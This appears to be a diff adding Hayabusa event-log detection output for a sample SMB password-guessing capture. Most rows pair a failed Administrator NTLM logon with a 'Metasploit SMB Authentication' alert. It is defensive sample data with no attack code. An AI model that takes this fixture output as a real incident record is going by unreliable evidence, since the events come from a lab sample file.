+2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RaKHRwYtx2lGtOCG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zDEDuMmlDZZfdkFD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CObqGJQi1hOOI83J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhsE9bQeEwW21bAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: El1qxgjvGS0QSS4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vtlr3HwzJcAfSxuO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KDayr44iXmE63vqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkNoLVOhnS8ayujK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3ggg78jjziKqijrT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BodeSVqeqa5qBQDL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yY7yxEcuGwWSJZV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oTlg6cvsz6Z6QpCp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3pTALzqu4Ok6CUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kdGagQIEcvQQMp4n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fVu4reOyQEIkChHO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EJWNS69MmMGLSnHc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nPaR2sBxPPCjxpL0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kJJ9A1EfqM4V2TRv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4dxf59xjpxO3oG17  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6dMI12g4tjSF8PX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZAqN0xPaW4jg2Kjc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mcnReyIEaqsQfowV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: akOH8Y7XdjOpqTez  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b0HOK1TIqloud7gh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n6uIAK55BmTnA6Bf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZDnn6QmLOJ6KwzKt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: np8KaRJvRqBrGyFL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dxbu69Amr6gWN5Hw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LoZdaFJWNON8Ujnc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q4RSlXgOS7sssCqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2PJprE7olK4pjrx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jQOAUcWQL32y2gGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nXI0wWwzhHN0uvOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ujGqTzfOhmKgoAjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cFoPtWZ03O3ZZgOC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EyO2VTnpGZLeSIvr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ua69MEWABQ9hsooT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ubPQWn4nQYr3rXr8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xrgATdNqkA44nKqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKwktiUfTWakNx3I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVebPFnWhbZKIANs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IyV8stIvfXLJQpsn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uStfvm0y0eZrWONH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUwTyUXe8NLG7bCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HQuDp8aZpWDANKMe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GQKTlzx2gq9ayAtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
